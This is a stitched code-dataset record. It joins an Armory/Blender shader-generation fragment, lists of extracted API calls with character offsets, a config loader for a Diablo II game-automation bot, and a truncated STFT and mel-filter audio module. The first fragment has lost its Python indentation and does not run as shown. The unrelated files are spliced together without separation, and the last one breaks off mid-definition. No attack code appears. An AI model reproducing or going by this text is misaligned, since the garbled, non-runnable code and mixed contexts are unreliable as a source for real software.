triplanar = node.projection == 'BOX'
if triplanar:
curshader.write(f'vec3 texCoordBlend = vec3(0.0); vec2 {uv_name}1 = vec2(0.0); vec2 {uv_name}2 = vec2(0.0);') # Temp
curshader.write(f'vec4 {tex_store} = vec4(0.0, 0.0, 0.0, 0.0);')
curshader.write(f'if (texCoordBlend.x > 0) {tex_store} += texture({tex_name}, {uv_name}.xy) * texCoordBlend.x;')
curshader.write(f'if (texCoordBlend.y > 0) {tex_store} += texture({tex_name}, {uv_name}1.xy) * texCoordBlend.y;')
curshader.write(f'if (texCoordBlend.z > 0) {tex_store} += texture({tex_name}, {uv_name}2.xy) * texCoordBlend.z;')
else:
if mat_texture_grad():
curshader.write('vec4 {0} = textureGrad({1}, {2}.xy, g2.xy, g2.zw);'.format(tex_store, tex_name, uv_name))
else:
curshader.write('vec4 {0} = texture({1}, {2}.xy);'.format(tex_store, tex_name, uv_name))
if sample_bump:
sample_bump_res = tex_store
curshader.write('float {0}_1 = textureOffset({1}, {2}.xy, ivec2(-2, 0)).r;'.format(tex_store, tex_name, uv_name))
curshader.write('float {0}_2 = textureOffset({1}, {2}.xy, ivec2(2, 0)).r;'.format(tex_store, tex_name, uv_name))
curshader.write('float {0}_3 = textureOffset({1}, {2}.xy, ivec2(0, -2)).r;'.format(tex_store, tex_name, uv_name))
curshader.write('float {0}_4 = textureOffset({1}, {2}.xy, ivec2(0, 2)).r;'.format(tex_store, tex_name, uv_name))
sample_bump = False
if to_linear:
curshader.write('{0}.rgb = pow({0}.rgb, vec3(2.2));'.format(tex_store))
return tex_store
def write_bump(node, res, scl=0.001):
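        # Approximates a height gradient for procedural textures: the generated
        # call string is split into prefix, coordinate and suffix, then re-emitted
        # four times with the coordinate nudged by +-scl along different axes.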
global sample_bump
global sample_bump_res
sample_bump_res = store_var_name(node) + '_bump'
        # Split the generated call string into prefix, coordinate argument and suffix
ar = res.split('(', 1)
pre = ar[0] + '('
if ',' in ar[1]:
ar2 = ar[1].split(',', 1)
co = ar2[0]
post = ',' + ar2[1]
else:
co = ar[1][:-1]
post = ')'
curshader.write('float {0}_1 = {1}{2} + vec3(-{4}, 0.0, 0.0){3};'.format(sample_bump_res, pre, co, post, scl))
curshader.write('float {0}_2 = {1}{2} + vec3({4}, 0.0, {4}){3};'.format(sample_bump_res, pre, co, post, scl))
curshader.write('float {0}_3 = {1}{2} + vec3(0.0, -{4}, 0.0){3};'.format(sample_bump_res, pre, co, post, scl))
curshader.write('float {0}_4 = {1}{2} + vec3(0.0, {4}, -{4}){3};'.format(sample_bump_res, pre, co, post, scl))
sample_bump = False
def to_vec1(v):
return str(v)
def to_vec3(v):
return 'vec3({0}, {1}, {2})'.format(v[0], v[1], v[2])
def node_by_type(nodes, ntype):
for n in nodes:
if n.type == ntype:
return n
def socket_index(node, socket):
for i in range(0, len(node.outputs)):
if node.outputs[i] == socket:
return i
def node_name(s):
for p in parents:
s = p.name + '_' + s
if curshader.write_textures > 0:
s += '_texread'
s = safesrc(s)
if '__' in s: # Consecutive _ are reserved
s = s.replace('_', '_x')
return s
##
def make_texture(image_node, tex_name, matname=None):
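    # Builds the texture export dict for an Image Texture node: resolves the image
    # path (unpacking packed/generated images and converting unsupported formats),
    # registers the file as a build asset and fills in filtering/addressing flags
    # from the node's interpolation and extension settings.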
tex = {}
tex['name'] = tex_name
image = image_node.image
if matname is None:
matname = mat_state.material.name
if image is None:
return None
# Get filepath
filepath = image.filepath
if filepath == '':
if image.packed_file is not None:
filepath = './' + image.name
has_ext = filepath.endswith(('.jpg', '.png', '.hdr'))
if not has_ext:
# Raw bytes, write converted .jpg to /unpacked
filepath += '.raw'
elif image.source == "GENERATED":
unpack_path = os.path.join(arm.utils.get_fp_build(), 'compiled', 'Assets', 'unpacked')
if not os.path.exists(unpack_path):
os.makedirs(unpack_path)
filepath = os.path.join(unpack_path, image.name + ".jpg")
arm.utils.convert_image(image, filepath, "JPEG")
else:
arm.log.warn(matname + '/' + image.name + ' - invalid file path')
return None
# Reference image name
texpath = arm.utils.asset_path(filepath)
texfile = arm.utils.extract_filename(filepath)
tex['file'] = arm.utils.safestr(texfile)
s = tex['file'].rsplit('.', 1)
if len(s) == 1:
arm.log.warn(matname + '/' + image.name + ' - file extension required for image name')
return None
ext = s[1].lower()
do_convert = ext not in ('jpg', 'png', 'hdr', 'mp4') # Convert image
if do_convert:
new_ext = 'png' if (ext in ('tga', 'dds')) else 'jpg'
tex['file'] = tex['file'].rsplit('.', 1)[0] + '.' + new_ext
if image.packed_file is not None or not is_ascii(texfile):
# Extract packed data / copy non-ascii texture
unpack_path = os.path.join(arm.utils.get_fp_build(), 'compiled', 'Assets', 'unpacked')
if not os.path.exists(unpack_path):
os.makedirs(unpack_path)
unpack_filepath = os.path.join(unpack_path, tex['file'])
if do_convert:
if not os.path.isfile(unpack_filepath):
fmt = 'PNG' if new_ext == 'png' else 'JPEG'
arm.utils.convert_image(image, unpack_filepath, file_format=fmt)
else:
# Write bytes if size is different or file does not exist yet
if image.packed_file is not None:
if not os.path.isfile(unpack_filepath) or os.path.getsize(unpack_filepath) != image.packed_file.size:
with open(unpack_filepath, 'wb') as f:
f.write(image.packed_file.data)
# Copy non-ascii texture
else:
if not os.path.isfile(unpack_filepath) or os.path.getsize(unpack_filepath) != os.path.getsize(texpath):
shutil.copy(texpath, unpack_filepath)
arm.assets.add(unpack_filepath)
else:
if not os.path.isfile(arm.utils.asset_path(filepath)):
arm.log.warn('Material ' + matname + '/' + image.name + ' - file not found(' + filepath + ')')
return None
if do_convert:
unpack_path = os.path.join(arm.utils.get_fp_build(), 'compiled', 'Assets', 'unpacked')
if not os.path.exists(unpack_path):
os.makedirs(unpack_path)
converted_path = os.path.join(unpack_path, tex['file'])
# TODO: delete cache when file changes
if not os.path.isfile(converted_path):
fmt = 'PNG' if new_ext == 'png' else 'JPEG'
arm.utils.convert_image(image, converted_path, file_format=fmt)
arm.assets.add(converted_path)
else:
# Link image path to assets
# TODO: Khamake converts .PNG to .jpg? Convert ext to lowercase on windows
if arm.utils.get_os() == 'win':
s = filepath.rsplit('.', 1)
arm.assets.add(arm.utils.asset_path(s[0] + '.' + s[1].lower()))
else:
arm.assets.add(arm.utils.asset_path(filepath))
# if image_format != 'RGBA32':
# tex['format'] = image_format
interpolation = image_node.interpolation
rpdat = arm.utils.get_rp()
texfilter = rpdat.arm_texture_filter
if texfilter == 'Anisotropic':
interpolation = 'Smart'
elif texfilter == 'Linear':
interpolation = 'Linear'
elif texfilter == 'Point':
interpolation = 'Closest'
# TODO: Blender seems to load full images on size request, cache size instead
powimage = is_pow(image.size[0]) and is_pow(image.size[1])
if interpolation == 'Cubic': # Mipmap linear
tex['mipmap_filter'] = 'linear'
tex['generate_mipmaps'] = True
elif interpolation == 'Smart': # Mipmap anisotropic
tex['min_filter'] = 'anisotropic'
tex['mipmap_filter'] = 'linear'
tex['generate_mipmaps'] = True
elif interpolation == 'Closest':
tex['min_filter'] = 'point'
tex['mag_filter'] = 'point'
# else defaults to linear
if image_node.extension != 'REPEAT': # Extend or clip
tex['u_addressing'] = 'clamp'
tex['v_addressing'] = 'clamp'
if image.source == 'MOVIE':
tex['source'] = 'movie'
tex['min_filter'] = 'linear'
tex['mag_filter'] = 'linear'
tex['mipmap_filter'] = 'no'
tex['generate_mipmaps'] = False
return tex
def is_pow(num):
return ((num & (num - 1)) == 0) and num != 0
def is_ascii(s):
return len(s) == len(s.encode())
##
def get_rp_renderer():
return arm.utils.get_rp().rp_renderer
def get_arm_export_tangents():
return bpy.data.worlds['Arm'].arm_export_tangents
def safesrc(name):
return arm.utils.safesrc(name)
def get_sdk_path():
return arm.utils.get_sdk_path()
def disp_enabled():
return arm.utils.disp_enabled(arm.make_state.target)
def warn(text):
arm.log.warn(text)
def assets_add(path):
arm.assets.add(path)
def assets_add_embedded_data(path):
arm.assets.add_embedded_data(path)
def mat_name():
return mat_state.material.name
def mat_batch():
return mat_state.batch
def mat_bind_texture(tex):
mat_state.bind_textures.append(tex)
def mat_texture_grad():
return mat_state.texture_grad
def mat_get_material():
return mat_state.material
def mat_get_material_users():
return mat_state.mat_users
| [
"arm.material.mat_state.bind_textures.append",
"os.path.exists",
"os.path.getsize",
"os.makedirs",
"os.path.join",
"os.path.isfile",
"math.cos",
"shutil.copy",
"math.sin"
]
| [((68911, 68946), 'arm.material.mat_state.bind_textures.append', 'mat_state.bind_textures.append', (['tex'], {}), '(tex)\n', (68941, 68946), True, 'import arm.material.mat_state as mat_state\n'), ((64744, 64782), 'os.path.join', 'os.path.join', (['unpack_path', "tex['file']"], {}), "(unpack_path, tex['file'])\n", (64756, 64782), False, 'import os\n'), ((64652, 64679), 'os.path.exists', 'os.path.exists', (['unpack_path'], {}), '(unpack_path)\n', (64666, 64679), False, 'import os\n'), ((64693, 64717), 'os.makedirs', 'os.makedirs', (['unpack_path'], {}), '(unpack_path)\n', (64704, 64717), False, 'import os\n'), ((66088, 66126), 'os.path.join', 'os.path.join', (['unpack_path', "tex['file']"], {}), "(unpack_path, tex['file'])\n", (66100, 66126), False, 'import os\n'), ((63612, 63658), 'os.path.join', 'os.path.join', (['unpack_path', "(image.name + '.jpg')"], {}), "(unpack_path, image.name + '.jpg')\n", (63624, 63658), False, 'import os\n'), ((64826, 64857), 'os.path.isfile', 'os.path.isfile', (['unpack_filepath'], {}), '(unpack_filepath)\n', (64840, 64857), False, 'import os\n'), ((65989, 66016), 'os.path.exists', 'os.path.exists', (['unpack_path'], {}), '(unpack_path)\n', (66003, 66016), False, 'import os\n'), ((66034, 66058), 'os.makedirs', 'os.makedirs', (['unpack_path'], {}), '(unpack_path)\n', (66045, 66058), False, 'import os\n'), ((66197, 66227), 'os.path.isfile', 'os.path.isfile', (['converted_path'], {}), '(converted_path)\n', (66211, 66227), False, 'import os\n'), ((63518, 63545), 'os.path.exists', 'os.path.exists', (['unpack_path'], {}), '(unpack_path)\n', (63532, 63545), False, 'import os\n'), ((63563, 63587), 'os.makedirs', 'os.makedirs', (['unpack_path'], {}), '(unpack_path)\n', (63574, 63587), False, 'import os\n'), ((65563, 65600), 'shutil.copy', 'shutil.copy', (['texpath', 'unpack_filepath'], {}), '(texpath, unpack_filepath)\n', (65574, 65600), False, 'import shutil\n'), ((65158, 65189), 'os.path.isfile', 'os.path.isfile', (['unpack_filepath'], {}), '(unpack_filepath)\n', (65172, 65189), False, 'import os\n'), ((65193, 65225), 'os.path.getsize', 'os.path.getsize', (['unpack_filepath'], {}), '(unpack_filepath)\n', (65208, 65225), False, 'import os\n'), ((65446, 65477), 'os.path.isfile', 'os.path.isfile', (['unpack_filepath'], {}), '(unpack_filepath)\n', (65460, 65477), False, 'import os\n'), ((65481, 65513), 'os.path.getsize', 'os.path.getsize', (['unpack_filepath'], {}), '(unpack_filepath)\n', (65496, 65513), False, 'import os\n'), ((65517, 65541), 'os.path.getsize', 'os.path.getsize', (['texpath'], {}), '(texpath)\n', (65532, 65541), False, 'import os\n'), ((37395, 37406), 'math.cos', 'math.cos', (['a'], {}), '(a)\n', (37403, 37406), False, 'import math\n'), ((37408, 37419), 'math.sin', 'math.sin', (['a'], {}), '(a)\n', (37416, 37419), False, 'import math\n')] |
import configparser
import numpy as np
import os
class Config:
def _select_val(self, section: str, key: str = None):
if section in self._custom and key in self._custom[section]:
return self._custom[section][key]
elif section in self._config:
return self._config[section][key]
elif section in self._pickit_config:
return self._pickit_config[section][key]
elif section in self._shop_config:
return self._shop_config[section][key]
else:
return self._game_config[section][key]
def __init__(self, print_warnings: bool = False):
        # print_warnings is a bit of a hack: it exists only because a single
        # Config instance is not passed through the rest of the code base.
self._print_warnings = print_warnings
self._config = configparser.ConfigParser()
self._config.read('config/params.ini')
self._game_config = configparser.ConfigParser()
self._game_config.read('config/game.ini')
self._pickit_config = configparser.ConfigParser()
self._pickit_config.read('config/pickit.ini')
self._shop_config = configparser.ConfigParser()
self._shop_config.read('config/shop.ini')
self._custom = configparser.ConfigParser()
if os.environ.get('RUN_ENV') != "test" and os.path.exists('config/custom.ini'):
self._custom.read('config/custom.ini')
self.general = {
"saved_games_folder": self._select_val("general", "saved_games_folder"),
"name": self._select_val("general", "name"),
"monitor": int(self._select_val("general", "monitor")),
"max_game_length_s": float(self._select_val("general", "max_game_length_s")),
"exit_key": self._select_val("general", "exit_key"),
"resume_key": self._select_val("general", "resume_key"),
"auto_settings_key": self._select_val("general", "auto_settings_key"),
"graphic_debugger_key": self._select_val("general", "graphic_debugger_key"),
"logg_lvl": self._select_val("general", "logg_lvl"),
"randomize_runs": bool(int(self._select_val("general", "randomize_runs"))),
"difficulty": self._select_val("general", "difficulty"),
"custom_message_hook": self._select_val("general", "custom_message_hook"),
"discord_status_count": False if not self._select_val("general", "discord_status_count") else int(self._select_val("general", "discord_status_count")),
"info_screenshots": bool(int(self._select_val("general", "info_screenshots"))),
"loot_screenshots": bool(int(self._select_val("general", "loot_screenshots"))),
}
# Added for dclone ip hunting
self.dclone = {
"region_ips": self._select_val("dclone", "region_ips"),
"dclone_hotip": self._select_val("dclone", "dclone_hotip"),
}
self.routes = {}
for key in self._config["routes"]:
self.routes[key] = bool(int(self._select_val("routes", key)))
self.char = {
"type": self._select_val("char", "type"),
"show_items": self._select_val("char", "show_items"),
"inventory_screen": self._select_val("char", "inventory_screen"),
"stand_still": self._select_val("char", "stand_still"),
"force_move": self._select_val("char", "force_move"),
"num_loot_columns": int(self._select_val("char", "num_loot_columns")),
"take_health_potion": float(self._select_val("char", "take_health_potion")),
"take_mana_potion": float(self._select_val("char", "take_mana_potion")),
"take_rejuv_potion_health": float(self._select_val("char", "take_rejuv_potion_health")),
"take_rejuv_potion_mana": float(self._select_val("char", "take_rejuv_potion_mana")),
"heal_merc": float(self._select_val("char", "heal_merc")),
"heal_rejuv_merc": float(self._select_val("char", "heal_rejuv_merc")),
"chicken": float(self._select_val("char", "chicken")),
"merc_chicken": float(self._select_val("char", "merc_chicken")),
"tp": self._select_val("char", "tp"),
"belt_rows": int(self._select_val("char", "belt_rows")),
"show_belt": self._select_val("char", "show_belt"),
"potion1": self._select_val("char", "potion1"),
"potion2": self._select_val("char", "potion2"),
"potion3": self._select_val("char", "potion3"),
"potion4": self._select_val("char", "potion4"),
"belt_rejuv_columns": int(self._select_val("char", "belt_rejuv_columns")),
"belt_hp_columns": int(self._select_val("char", "belt_hp_columns")),
"belt_mp_columns": int(self._select_val("char", "belt_mp_columns")),
"stash_gold": bool(int(self._select_val("char", "stash_gold"))),
"gold_trav_only": bool(int(self._select_val("char", "gold_trav_only"))),
"use_merc": bool(int(self._select_val("char", "use_merc"))),
"pre_buff_every_run": bool(int(self._select_val("char", "pre_buff_every_run"))),
"cta_available": bool(int(self._select_val("char", "cta_available"))),
"weapon_switch": self._select_val("char", "weapon_switch"),
"battle_orders": self._select_val("char", "battle_orders"),
"battle_command": self._select_val("char", "battle_command"),
"casting_frames": int(self._select_val("char", "casting_frames")),
"atk_len_trav": float(self._select_val("char", "atk_len_trav")),
"atk_len_pindle": float(self._select_val("char", "atk_len_pindle")),
"atk_len_eldritch": float(self._select_val("char", "atk_len_eldritch")),
"atk_len_shenk": float(self._select_val("char", "atk_len_shenk")),
"atk_len_nihlatak": float(self._select_val("char", "atk_len_nihlatak")),
"hork_time_pindle": float(self._select_val("char", "hork_time_pindle")),
"hork_time_eldritch": float(self._select_val("char", "hork_time_eldritch")),
"hork_time_shenk": float(self._select_val("char", "hork_time_shenk")),
"hork_time_council": float(self._select_val("char", "hork_time_council")),
"hork_time_nihlatak": float(self._select_val("char", "hork_time_nihlatak")),
}
self.sorceress = dict(self._config["sorceress"])
if "sorceress" in self._custom:
self.sorceress.update(dict(self._custom["sorceress"]))
self.hammerdin = self._config["hammerdin"]
if "hammerdin" in self._custom:
self.hammerdin.update(self._custom["hammerdin"])
self.trapsin = self._config["trapsin"]
if "trapsin" in self._custom:
self.trapsin.update(self._custom["trapsin"])
self.barbarian = self._config["barbarian"]
if "barbarian" in self._custom:
self.barbarian.update(self._custom["barbarian"])
self.advanced_options = {
"pathing_delay_factor": min(max(int(self._select_val("advanced_options", "pathing_delay_factor")), 1), 10),
"message_headers": self._select_val("advanced_options", "message_headers"),
"message_body_template": self._select_val("advanced_options", "message_body_template"),
"message_highlight": bool(int(self._select_val("advanced_options", "message_highlight"))),
}
self.items = {}
for key in self._pickit_config["items"]:
self.items[key] = int(self._select_val("items", key))
if self.items[key] and not os.path.exists(f"./assets/items/{key}.png") and self._print_warnings:
print(f"Warning: You activated {key} in pickit, but there is no img available in assets/items")
self.colors = {}
for key in self._game_config["colors"]:
self.colors[key] = np.split(np.array([int(x) for x in self._select_val("colors", key).split(",")]), 2)
self.ui_pos = {}
for key in self._game_config["ui_pos"]:
self.ui_pos[key] = int(self._select_val("ui_pos", key))
self.ui_roi = {}
for key in self._game_config["ui_roi"]:
self.ui_roi[key] = np.array([int(x) for x in self._select_val("ui_roi", key).split(",")])
self.path = {}
for key in self._game_config["path"]:
self.path[key] = np.reshape(np.array([int(x) for x in self._select_val("path", key).split(",")]), (-1, 2))
self.shop = {
"shop_trap_claws": bool(int(self._select_val("claws", "shop_trap_claws"))),
"shop_melee_claws": bool(int(self._select_val("claws", "shop_melee_claws"))),
"shop_3_skills_ias_gloves": bool(int(self._select_val("gloves", "shop_3_skills_ias_gloves"))),
"shop_2_skills_ias_gloves": bool(int(self._select_val("gloves", "shop_2_skills_ias_gloves"))),
"trap_min_score": int(self._select_val("claws", "trap_min_score")),
"melee_min_score": int(self._select_val("claws", "melee_min_score")),
}
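# A minimal usage sketch (hedged; it assumes the ini files referenced above exist
# under ./config). _select_val resolves each key with custom.ini taking precedence
# over params.ini, then pickit.ini, shop.ini and finally game.ini:
#   config = Config(print_warnings=True)
#   config.char["type"]        # custom.ini [char] wins over params.ini when present
#   config.general["monitor"]  # already parsed to int in __init__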
if __name__ == "__main__":
config = Config(print_warnings=True)
# Check if any added items miss templates
for k in config.items:
if not os.path.exists(f"./assets/items/{k}.png"):
print(f"Template not found: {k}")
# Check if any item templates miss a config
for filename in os.listdir(f'assets/items'):
filename = filename.lower()
if filename.endswith('.png'):
item_name = filename[:-4]
blacklist_item = item_name.startswith("bl__")
if item_name not in config.items and not blacklist_item:
print(f"Config not found for: " + filename)
| [
"os.path.exists",
"os.listdir",
"os.environ.get",
"configparser.ConfigParser"
]
| [((9646, 9673), 'os.listdir', 'os.listdir', (['f"""assets/items"""'], {}), "(f'assets/items')\n", (9656, 9673), False, 'import os\n'), ((871, 898), 'configparser.ConfigParser', 'configparser.ConfigParser', ([], {}), '()\n', (896, 898), False, 'import configparser\n'), ((976, 1003), 'configparser.ConfigParser', 'configparser.ConfigParser', ([], {}), '()\n', (1001, 1003), False, 'import configparser\n'), ((1086, 1113), 'configparser.ConfigParser', 'configparser.ConfigParser', ([], {}), '()\n', (1111, 1113), False, 'import configparser\n'), ((1198, 1225), 'configparser.ConfigParser', 'configparser.ConfigParser', ([], {}), '()\n', (1223, 1225), False, 'import configparser\n'), ((1301, 1328), 'configparser.ConfigParser', 'configparser.ConfigParser', ([], {}), '()\n', (1326, 1328), False, 'import configparser\n'), ((1381, 1416), 'os.path.exists', 'os.path.exists', (['"""config/custom.ini"""'], {}), "('config/custom.ini')\n", (1395, 1416), False, 'import os\n'), ((9484, 9525), 'os.path.exists', 'os.path.exists', (['f"""./assets/items/{k}.png"""'], {}), "(f'./assets/items/{k}.png')\n", (9498, 9525), False, 'import os\n'), ((1341, 1366), 'os.environ.get', 'os.environ.get', (['"""RUN_ENV"""'], {}), "('RUN_ENV')\n", (1355, 1366), False, 'import os\n'), ((7826, 7869), 'os.path.exists', 'os.path.exists', (['f"""./assets/items/{key}.png"""'], {}), "(f'./assets/items/{key}.png')\n", (7840, 7869), False, 'import os\n')] |
# Copyright 2019 <NAME>
# License: Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
import math
import numpy as np
import torch as th
import torch.nn as nn
import torch.nn.functional as tf
import librosa.filters as filters
from aps.const import EPSILON
from typing import Optional, Union, Tuple
def init_window(wnd: str, frame_len: int) -> th.Tensor:
"""
Return window coefficient
Args:
wnd: window name
frame_len: length of the frame
"""
def sqrthann(frame_len, periodic=True):
return th.hann_window(frame_len, periodic=periodic)**0.5
if wnd not in ["bartlett", "hann", "hamm", "blackman", "rect", "sqrthann"]:
raise RuntimeError(f"Unknown window type: {wnd}")
wnd_tpl = {
"sqrthann": sqrthann,
"hann": th.hann_window,
"hamm": th.hamming_window,
"blackman": th.blackman_window,
"bartlett": th.bartlett_window,
"rect": th.ones
}
if wnd != "rect":
# match with librosa
c = wnd_tpl[wnd](frame_len, periodic=True)
else:
c = wnd_tpl[wnd](frame_len)
return c
def init_kernel(frame_len: int,
frame_hop: int,
window: str,
round_pow_of_two: bool = True,
normalized: bool = False,
inverse: bool = False,
mode: str = "librosa") -> th.Tensor:
"""
Return STFT kernels
Args:
frame_len: length of the frame
frame_hop: hop size between frames
window: window name
round_pow_of_two: if true, choose round(#power_of_two) as the FFT size
normalized: return normalized DFT matrix
inverse: return iDFT matrix
mode: framing mode (librosa or kaldi)
"""
if mode not in ["librosa", "kaldi"]:
raise ValueError(f"Unsupported mode: {mode}")
# FFT points
B = 2**math.ceil(math.log2(frame_len)) if round_pow_of_two else frame_len
# center padding window if needed
if mode == "librosa" and B != frame_len:
lpad = (B - frame_len) // 2
window = tf.pad(window, (lpad, B - frame_len - lpad))
if normalized:
# make K^H * K = I
S = B**0.5
else:
S = 1
I = th.stack([th.eye(B), th.zeros(B, B)], dim=-1)
# W x B x 2
K = th.fft(I / S, 1)
if mode == "kaldi":
K = K[:frame_len]
if inverse and not normalized:
# to make K^H * K = I
K = K / B
# 2 x B x W
K = th.transpose(K, 0, 2) * window
# 2B x 1 x W
K = th.reshape(K, (B * 2, 1, K.shape[-1]))
return K, window
def mel_filter(frame_len: int,
round_pow_of_two: bool = True,
num_bins: Optional[int] = None,
sr: int = 16000,
num_mels: int = 80,
fmin: float = 0.0,
fmax: Optional[float] = None,
norm: bool = False) -> th.Tensor:
"""
Return mel filter coefficients
Args:
frame_len: length of the frame
round_pow_of_two: if true, choose round(#power_of_two) as the FFT size
num_bins: number of the frequency bins produced by STFT
num_mels: number of the mel bands
fmin: lowest frequency (in Hz)
fmax: highest frequency (in Hz)
norm: normalize the mel filter coefficients
"""
# FFT points
if num_bins is None:
N = 2**math.ceil(
math.log2(frame_len)) if round_pow_of_two else frame_len
else:
N = (num_bins - 1) * 2
# fmin & fmax
freq_upper = sr // 2
if fmax is None:
fmax = freq_upper
else:
fmax = min(fmax + freq_upper if fmax < 0 else fmax, freq_upper)
fmin = max(0, fmin)
# mel filter coefficients
mel = filters.mel(sr,
N,
n_mels=num_mels,
fmax=fmax,
fmin=fmin,
htk=True,
norm="slaney" if norm else None)
# num_mels x (N // 2 + 1)
return th.tensor(mel, dtype=th.float32)
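# A minimal usage sketch (hedged, relying only on the function above): a
# 512-sample frame is rounded to a 512-point FFT, so mel_filter returns an
# 80 x 257 matrix mapping the 257 linear-frequency bins onto 80 mel bands:
#   fbank = mel_filter(512, num_mels=80, sr=16000)   # -> th.Size([80, 257])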
def speed_perturb_filter(src_sr: int,
dst_sr: int,
cutoff_ratio: float = 0.95,
num_zeros: int = 64) -> th.Tensor:
"""
Return speed perturb filters, reference:
https://github.com/danpovey/filtering/blob/master/lilfilter/resampler.py
Args:
src_sr: sample rate of the source signal
dst_sr: sample rate of the target signal
Return:
weight (Tensor): coefficients of the filter
"""
if src_sr == dst_sr:
raise ValueError(
f"src_sr should not be equal to dst_sr: {src_sr}/{dst_sr}")
gcd = math.gcd(src_sr, dst_sr)
src_sr = src_sr // gcd
dst_sr = dst_sr // gcd
if src_sr == 1 or dst_sr == 1:
raise ValueError("do not support integer downsample/upsample")
zeros_per_block = min(src_sr, dst_sr) * cutoff_ratio
padding = 1 + int(num_zeros / zeros_per_block)
# dst_sr x src_sr x K
times = (np.arange(dst_sr)[:, None, None] / float(dst_sr) -
np.arange(src_sr)[None, :, None] / float(src_sr) -
np.arange(2 * padding + 1)[None, None, :] + padding)
window = np.heaviside(1 - np.abs(times / padding),
0.0) * (0.5 + 0.5 * np.cos(times / padding * math.pi))
weight = np.sinc(
times * zeros_per_block) * window * zeros_per_block / float(src_sr)
return th.tensor(weight, dtype=th.float32)
def splice_feature(feats: th.Tensor,
lctx: int = 1,
rctx: int = 1,
subsampling_factor: int = 1,
op: str = "cat") -> th.Tensor:
"""
Splice feature
Args:
feats (Tensor): N x ... x T x F, original feature
lctx: left context
rctx: right context
subsampling_factor: subsampling factor
op: operator on feature context
Return:
splice (Tensor): feature with context padded
"""
if lctx + rctx == 0:
return feats
if op not in ["cat", "stack"]:
raise ValueError(f"Unknown op for feature splicing: {op}")
# [N x ... x T x F, ...]
ctx = []
T = feats.shape[-2]
T = T - T % subsampling_factor
for c in range(-lctx, rctx + 1):
idx = th.arange(c, c + T, device=feats.device, dtype=th.int64)
idx = th.clamp(idx, min=0, max=T - 1)
ctx.append(th.index_select(feats, -2, idx))
if op == "cat":
# N x ... x T x FD
splice = th.cat(ctx, -1)
else:
# N x ... x T x F x D
splice = th.stack(ctx, -1)
return splice
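# A minimal usage sketch (hedged): with one frame of left and right context and
# the default op="cat", an N x T x F feature is widened to N x T x 3F:
#   feats = th.randn(2, 10, 40)
#   splice_feature(feats, lctx=1, rctx=1).shape   # -> th.Size([2, 10, 120])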
def _forward_stft(
wav: th.Tensor,
kernel: th.Tensor,
output: str = "polar",
pre_emphasis: float = 0,
frame_hop: int = 256,
onesided: bool = False,
center: bool = False) -> Union[th.Tensor, Tuple[th.Tensor, th.Tensor]]:
"""
STFT inner function
Args:
wav (Tensor), N x (C) x S
kernel (Tensor), STFT transform kernels, from init_kernel(...)
output (str), output format:
polar: return (magnitude, phase) pair
complex: return (real, imag) pair
real: return [real; imag] Tensor
frame_hop: frame hop size in number samples
pre_emphasis: factor of preemphasis
onesided: return half FFT bins
center: if true, we assumed to have centered frames
Return:
transform (Tensor or [Tensor, Tensor]), STFT transform results
"""
wav_dim = wav.dim()
if output not in ["polar", "complex", "real"]:
raise ValueError(f"Unknown output format: {output}")
if wav_dim not in [2, 3]:
raise RuntimeError(f"STFT expect 2D/3D tensor, but got {wav_dim:d}D")
# if N x S, reshape N x 1 x S
# else: reshape NC x 1 x S
N, S = wav.shape[0], wav.shape[-1]
wav = wav.view(-1, 1, S)
# NC x 1 x S+2P
if center:
pad = kernel.shape[-1] // 2
# NOTE: match with librosa
wav = tf.pad(wav, (pad, pad), mode="reflect")
# STFT
if pre_emphasis > 0:
# NC x W x T
frames = tf.unfold(wav[:, None], (1, kernel.shape[-1]),
stride=frame_hop,
padding=0)
frames[:, 1:] = frames[:, 1:] - pre_emphasis * frames[:, :-1]
# 1 x 2B x W, NC x W x T, NC x 2B x T
packed = th.matmul(kernel[:, 0][None, ...], frames)
else:
packed = tf.conv1d(wav, kernel, stride=frame_hop, padding=0)
# NC x 2B x T => N x C x 2B x T
if wav_dim == 3:
packed = packed.view(N, -1, packed.shape[-2], packed.shape[-1])
# N x (C) x B x T
real, imag = th.chunk(packed, 2, dim=-2)
# N x (C) x B/2+1 x T
if onesided:
num_bins = kernel.shape[0] // 4 + 1
real = real[..., :num_bins, :]
imag = imag[..., :num_bins, :]
if output == "complex":
return (real, imag)
elif output == "real":
return th.stack([real, imag], dim=-1)
else:
mag = (real**2 + imag**2 + EPSILON)**0.5
pha = th.atan2(imag, real)
return (mag, pha)
def _inverse_stft(transform: Union[th.Tensor, Tuple[th.Tensor, th.Tensor]],
kernel: th.Tensor,
window: th.Tensor,
input: str = "polar",
frame_hop: int = 256,
onesided: bool = False,
center: bool = False) -> th.Tensor:
"""
iSTFT inner function
Args:
transform (Tensor or [Tensor, Tensor]), STFT transform results
kernel (Tensor), STFT transform kernels, from init_kernel(...)
input (str), input format:
polar: return (magnitude, phase) pair
complex: return (real, imag) pair
real: return [real; imag] Tensor
frame_hop: frame hop size in number samples
onesided: return half FFT bins
center: used in _forward_stft
Return:
wav (Tensor), N x S
"""
if input not in ["polar", "complex", "real"]:
raise ValueError(f"Unknown output format: {input}")
if input == "real":
real, imag = transform[..., 0], transform[..., 1]
elif input == "polar":
real = transform[0] * th.cos(transform[1])
imag = transform[0] * th.sin(transform[1])
else:
real, imag = transform
# (N) x F x T
imag_dim = imag.dim()
if imag_dim not in [2, 3]:
raise RuntimeError(f"Expect 2D/3D tensor, but got {imag_dim}D")
# if F x T, reshape 1 x F x T
if imag_dim == 2:
real = th.unsqueeze(real, 0)
imag = th.unsqueeze(imag, 0)
if onesided:
# [self.num_bins - 2, ..., 1]
reverse = range(kernel.shape[0] // 4 - 1, 0, -1)
# extend matrix: N x B x T
real = th.cat([real, real[:, reverse]], 1)
imag = th.cat([imag, -imag[:, reverse]], 1)
# pack: N x 2B x T
packed = th.cat([real, imag], dim=1)
# N x 1 x T
s = tf.conv_transpose1d(packed, kernel, stride=frame_hop, padding=0)
# normalized audio samples
# refer: https://github.com/pytorch/audio/blob/2ebbbf511fb1e6c47b59fd32ad7e66023fa0dff1/torchaudio/functional.py#L171
# 1 x W x T
win = th.repeat_interleave(window[None, ..., None],
packed.shape[-1],
dim=-1)
# W x 1 x W
I = th.eye(window.shape[0], device=win.device)[:, None]
# 1 x 1 x T
norm = tf.conv_transpose1d(win**2, I, stride=frame_hop, padding=0)
if center:
pad = kernel.shape[-1] // 2
s = s[..., pad:-pad]
norm = norm[..., pad:-pad]
s = s / (norm + EPSILON)
# N x S
s = s.squeeze(1)
return s
def forward_stft(
wav: th.Tensor,
frame_len: int,
frame_hop: int,
output: str = "complex",
window: str = "sqrthann",
round_pow_of_two: bool = True,
